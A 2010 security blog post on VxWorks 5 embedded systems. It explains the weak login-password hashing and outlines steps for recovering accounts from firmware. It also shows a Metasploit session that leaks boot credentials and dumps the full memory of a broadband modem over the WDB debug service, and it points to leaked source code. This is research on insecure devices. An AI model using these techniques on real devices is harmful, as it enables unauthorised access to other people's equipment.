Wednesday, September 01, 2010

Follow-up on VxWorks issue

Introduction

As a follow-up to H. D. Moore research on VxWorks, I would like to share some personal thoughts on the matter.

I happen to have some experience with VxWorks, since this operating system used to be quite popular among broadband modem manufacturers. And I have always been fascinated by those SpyBoxes.

VxWorks software is now easier to get ahold of, since trial/evaluation software is readily available. However, by the time of VxWorks 5 (and older), things were a bit more tricky.

HDM pointed out that VxWorks source code leaked on PUDN Web site. As a rule of thumb, most of the world intellectual property is available from the Chinese Internet. However there are many other ways to browse the source (warning: all links below might disappear from the Internet without warning).
  • Universities and student projects [1]
  • Training courses [1]
  • VxWorks enthusiasts [1] [2] [3]
  • Third-party SDKs (for systems that have been built on the top of VxWorks) [1]
  • Hardware hackers [1]
In the end, whatever you are looking for, Internet has it :)

Authentication

Now let's have a look at VxWorks authentication mechanism (described here and here).


Quoting usrConfig.c:

(…)
loginInit (); /* initialize login table */
shellLoginInstall (loginPrompt, NULL); /* install security program */
/* add additional users here as required */
loginUserAdd (LOGIN_USER_NAME, LOGIN_PASSWORD);
}
#endif /* INCLUDE_SECURITY */
printLogo (); /* print out the banner page */
printf (" ");
printf ("CPU: %s. Processor #%d.\n", sysModel (), sysProcNumGet ());
printf (" ");
printf ("Memory Size: 0x%x.", sysMemTop () - (char *)LOCAL_MEM_LOCAL_ADRS);
printf (" BSP version %s.\n\n", bspVersion ());
(…)

Authentication is optional – #INCLUDE_SECURITY must be defined at compile time.

By default, loginUserAdd() must be called for creating each user account dynamically - there is no user/password "file" (since there might be no filesystem at all on the target system).

Password is "encrypted" using a VxWorks-proprietary algorithm. Quoting http://www.xs4all.nl/~borkhuis/vxworks/vxw_pt1.html:
"Q: How can I create (encrypted) passwords?
A: You can use vxencrypt that comes with Tornado to create passwords, but it is pretty weak.
I think it is sum( p[i] * i ^ i )) * 0x1e3a1d5 converted to ascii with a munged hex character set (presumably to make you think there are more than 2^32 encrypted passwords). I think I could reverse that using pen and paper."
Therefore it is possible to log into any VxWorks 5 system in default configuration, given the following steps:

  • Grab a copy of the firmware (more about this later)
  • Find the banner printing code
  • Look a few opcodes before - you will presumably find call(s) to loginUserAdd().
  • Reverse passwords (using pen and paper ;)
Practical use case

Let's take the Trio3C broadband modem that has been widely distributed by Neuf Telecom a few years ago. This model has been superseded by the NeufBox4, and you could find second-hand modems for less than 5 euros nowadays. Trio3C appears to be running under VxWorks 5, and to have remote debugging enabled.

$ ./msfconsole

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 584 exploits - 297 auxiliary
+ -- --=[ 219 payloads - 27 encoders - 8 nops
       =[ svn r10182 updated today (2010.08.29)

msf| use auxiliary/scanner/vxworks/wdbrpc_bootline

msf auxiliary(wdbrpc_bootline)| set RHOSTS 192.168.1.1/32
RHOSTS =| 192.168.1.1/32

msf auxiliary(wdbrpc_bootline)| run

[*] 192.168.1.1: VxWorks5.4.2 Centillium Palladia 4K
[*] 192.168.1.1: BOOT: tffs=0,0(0,0)host:/tffs/vxworks.s e=192.168.1.4:0xffffff00 h=192.168.1.10 u=p220 pw=p220
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(wdbrpc_bootline)| use auxiliary/admin/vxworks/wdbrpc_memory_dump

msf auxiliary(wdbrpc_memory_dump)| set RHOST 192.168.1.1
RHOST =| 192.168.1.1

msf auxiliary(wdbrpc_memory_dump)| set LPATH /tmp/memory.dmp
LPATH =| /tmp/memory.dmp

msf auxiliary(wdbrpc_memory_dump)| run

[*] Attempting to dump system memory...
[*] 192.168.1.1 Connected to VxWorks5.4.2 - Centillium Palladia 4K ()
[*] Dumping 0x00fef800 bytes from base address 0x80000000 at offset 0x00000000...
[*] [ 00 % ] Downloaded 0x00000b18 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:11 +0200 2010)
[*] [ 00 % ] Downloaded 0x000010a4 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:34 +0200 2010)
(...)
[*] Dumped 0x00fefba0 bytes.
[*] Auxiliary module execution completed

The complete memory dump decompiles cleanly in IDA Pro [*] (base ROM address is kindly provided by the debugger).


Unfortunately for the demo, it appears that no hardcoded account is to be found. User accounts and (cleartext) passwords are stored within a configuration file. But that was a fun exercise anyway :)



[*] Actually not, I had to request a patch for the MIPS processor module :)

3 comments:

Anonymous said...

Hey,

This is a message for the webmaster/admin here at www.blogger.com.

May I use part of the information from your post above if I provide a link back to this site?

Thanks,
John

Anonymous said...

The request for permission to post information with the promise of a link is bogus.

I have received several identical requests at my blog although the names of the requester varies (James, John, Thomas etc)

There is a similar message saying thanks for sharing this link but unfortunately it seems to be not working does anybody here at ... ... have a mirror or another source? Cheers, (James, John, Thomas or whoever)

newsoft said...

Thank you for the feedback. I still fail to see the scheme behind those "spam" comments ...